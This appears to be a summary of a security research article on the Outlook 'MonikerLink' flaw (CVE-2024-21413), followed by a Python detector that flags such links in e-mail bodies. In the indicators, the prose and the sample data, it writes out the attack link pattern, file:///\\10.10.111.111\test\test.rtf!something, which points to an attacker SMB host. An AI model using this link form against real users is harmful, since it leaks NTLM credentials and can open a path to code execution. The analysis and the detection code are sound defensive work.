The Risks of the #MonikerLink Bug in Microsoft Outlook and the Big Picture – Check Point Research

Keypoints

  • Outlook treats certain file:// links that include an exclamation mark (e.g., file:///\\10.10.111.111\test\test.rtf!item) as COM “Moniker Links” instead of ordinary file URLs.
  • When such a link is clicked, Outlook calls ole32!MkParseDisplayName(), passing the moniker string (the file prefix is removed) to the COM parsing APIs.
  • The composite moniker is interpreted as a FileMoniker plus an ItemMoniker, which directs Windows to run a COM server (e.g., Word) to “look up” the object referenced by the moniker.
  • Microsoft Word, launched as a COM server in the background, will open and parse the remote RTF file over SMB, which can leak NTLM credential hashes to the attacker-controlled server.
  • Because the document is parsed by Word in COM-server mode at Medium integrity, this workflow can bypass Protected View and enable exploitation of parsing bugs to achieve remote code execution.
  • Check Point reproduced a crash in WINWORD.EXE using an RTF PoC and confirmed the MkParseDisplayName breakpoint is hit when the link is clicked.
  • Microsoft issued a critical Outlook patch (CVE-2024-21413) to address the issue; users should apply the update promptly.

MITRE Techniques

  • No MITRE ATT&CK technique IDs are explicitly referenced in the article; it describes a COM moniker parsing and exploitation flow that results in credential leakage and potential remote code execution.

Indicators of Compromise

  • [IP address] example used in PoC – 10.10.111.111 (attacker-controlled SMB host used in test links)
  • [Filename] remote resource referenced – test.rtf (example RTF file fetched by Word), and other attachment names implied
  • [URL/Link string] moniker example – file:///\\10.10.111.111\test\test.rtf!something (shows the composite Moniker format that triggers COM parsing)
  • [Vulnerability ID] patch reference – CVE-2024-21413 (Outlook security update addressing the bug)

Outlook’s hyperlink handling treats regular http(s) links as browser targets, but when a file:// link contains an exclamation mark (e.g., file:///\\10.10.111.111\test\test.rtf!something) Outlook strips the file prefix and passes the remaining string to ole32!MkParseDisplayName(). That call interprets the string as a composite moniker (FileMoniker + ItemMoniker), which causes Windows to invoke the appropriate COM server (for .rtf, Microsoft Word) to resolve the moniker and access the referenced file.

Once invoked as a COM server, Word runs in the background and opens/parses the remote RTF over SMB; that network access can expose NTLM authentication material to the attacker-controlled host. Because the parsing occurs in Word’s COM-server context at Medium integrity and not in Protected View, any parsing vulnerability in the target application (Word or other COM servers) can be triggered directly from a single click, enabling potential remote code execution. Check Point validated the flow by hitting a breakpoint on MkParseDisplayName() in WinDbg and reproducing a WINWORD.EXE crash with an RTF PoC.

Mitigation requires patching: Microsoft released a critical Outlook update (CVE-2024-21413) that addresses this behavior; apply it immediately. Developers and security teams should audit uses of MkParseDisplayName/MkParseDisplayNameEx and test inputs that follow the moniker pattern (file:///\\ip\path!item) to find other affected software that might hand attacker-controlled monikers to COM APIs.
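The link shape described above (a file: URL whose path is split by “!” into a FileMoniker and an ItemMoniker) is easy to check for in mail flow while the patch is being rolled out. The following is an added triage example, not Check Point’s code or any Outlook component: it splits a candidate link the way the article says Outlook does, pulls out the SMB host, file moniker, item moniker and file type, and scans a constructed e-mail body for links matching the pattern. The sample body and the helper names (`parse_moniker_link`, `find_moniker_links`) are assumptions for illustration; the host and path values reuse the article’s own example.

```python
import os
import re
from urllib.parse import unquote

# Any "file:" token in a message body (HTML href or plain text).
# Hypothetical detector regex, not Outlook's own parsing logic.
FILE_LINK_RE = re.compile(r"file:[^\s\"'<>]+", re.IGNORECASE)


def parse_moniker_link(url):
    """Split a file:// link the way the article describes Outlook's handling:
    a '!' marks a composite moniker (FileMoniker + ItemMoniker) that Outlook
    hands to MkParseDisplayName(). Returns None for an ordinary file link."""
    s = unquote(url.strip())
    if not s.lower().startswith("file:"):
        return None
    rest = s[len("file:"):]
    if "!" not in rest:
        return None  # plain file URL: not routed through the moniker parser
    path, item = rest.split("!", 1)
    # File moniker part with the URL slashes removed; UNC paths keep their leading \\
    stripped = path.lstrip("/")
    host = None
    if stripped.startswith("\\\\"):
        host = re.split(r"[\\/]", stripped[2:], maxsplit=1)[0]
    elif path.startswith("//") and not path.startswith("///"):
        # file://host/share/... form: the URL authority is the SMB host
        host = re.split(r"[\\/]", path[2:], maxsplit=1)[0]
    ext = os.path.splitext(stripped.replace("\\", "/"))[1].lower()
    return {
        "url": url,
        "file_moniker": stripped,
        "item_moniker": item,
        "remote_host": host,
        "extension": ext,
    }


def find_moniker_links(body):
    """Scan an e-mail body (HTML or plain text) and return every link that
    matches the composite-moniker pattern, with the fields an analyst needs."""
    hits = []
    for m in FILE_LINK_RE.finditer(body):
        parsed = parse_moniker_link(m.group(0))
        if parsed:
            parsed["reason"] = (
                "file: link with '!' (FileMoniker!ItemMoniker) is passed to COM "
                "MkParseDisplayName(); a COM server such as Word may open the "
                "target outside Protected View"
            )
            hits.append(parsed)
    return hits


# Constructed sample body: one https link, one plain file share link (no '!'),
# and one MonikerLink-style link built from the article's example values.
SAMPLE_BODY = (
    '<html><body>'
    '<p>Quarterly report: <a href="https://intranet.example.test/report">open</a></p>'
    r'<p>Old share: <a href="file:///\\fileserver.example.test\docs\q1.docx">archive</a></p>'
    r'<p>Click <a href="file:///\\10.10.111.111\test\test.rtf!something">here</a> to view</p>'
    '</body></html>'
)

if __name__ == "__main__":
    for h in find_moniker_links(SAMPLE_BODY):
        print(f"MonikerLink-style link -> host={h['remote_host']} "
              f"file={h['file_moniker']} item={h['item_moniker']} type={h['extension']}")
```

Only the third link is reported: the https link never reaches the file: handler, and the plain share link has no “!” so, per the article, Outlook treats it as an ordinary file URL. The extension field matters for triage because it is what selects the COM server (here Word for .rtf), and the host field gives the SMB endpoint that would receive the NTLM exchange. Percent-encoded backslashes are decoded before matching; a production scanner would also walk MIME parts and decode HTML entities before applying the same check.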

Read more: https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/